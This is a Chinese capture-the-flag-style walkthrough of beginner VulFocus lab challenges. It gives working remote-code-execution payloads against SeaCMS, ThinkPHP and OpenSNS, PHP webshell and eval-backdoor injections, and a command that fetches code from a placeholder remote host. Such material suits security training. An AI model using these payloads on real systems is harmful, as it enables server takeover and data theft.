漏洞指北-VulFocus靶场专栏-初级
- 初级001 🌸海洋CMS代码执行(CNVD-2020-22721🌸
- step1:进入后台页面 账号密码:admin amdin
- step2:点击系统,点击后台IP安全设置,关闭
- step3 启动burpsuite,启动代理,抓请求包
- step4 http请求包中加入后门,等200 的响应状态码
- step5 200OK ,进入admin页面,寻找flag,结束
- 初级002 🌸thinkphp 代码执行 (CNVD-2018-24942)🌸
- 方法1:构造payload远程代码执行,输入ls /tmp指令
- 方法2: 构造一句话木马
- result:探囊取物
- 初级003 🌸phpinfo-inclusion 文件写入🌸
- step1 去指定地址的phpinfo.php文件夹下面
- step2 获取信息后 寻找flag
- 初级004 🌸opensns 命令执行 (CNVD-2021-34590🌸
- step1 构造网页的payload即可
- 方案2 hackbar
初级001 🌸海洋CMS代码执行(CNVD-2020-22721🌸
原因:
命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
解决方案:
step1:进入后台页面 账号密码:admin amdin
http://10.11.12.28:17302/manager/login.php
step2:点击系统,点击后台IP安全设置,关闭
拼接指令cmd = ls /tmp
cmd就是执行shell的命令
常见的flag一般都是在/tmp页面下
注意‘ ’的符号是%20 ,后面玩捉迷藏有时候会用到这个点。
step3 启动burpsuite,启动代理,抓请求包
step4 http请求包中加入后门,等200 的响应状态码
v=0&ip=+11111111111";phpinfo();eval($_POST[cmd]);//
step5 200OK ,进入admin页面,寻找flag,结束
http://10.11.12.28:17302/manager/admin_ip.php
初级002 🌸thinkphp 代码执行 (CNVD-2018-24942)🌸
原因:
由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
解决方案:
方法1:构造payload远程代码执行,输入ls /tmp指令
http://10.11.12.28:24050/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp
方法2: 构造一句话木马
http://10.11.12.28:24050/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E
result:探囊取物
初级003 🌸phpinfo-inclusion 文件写入🌸
原因
phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件,然后读取从而getshell
step1 去指定地址的phpinfo.php文件夹下面
http://10.11.12.28:20756/phpinfo.php
step2 获取信息后 寻找flag
初级004 🌸opensns 命令执行 (CNVD-2021-34590🌸
原因
OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限
step1 构造网页的payload即可
http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
方案2 hackbar
http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)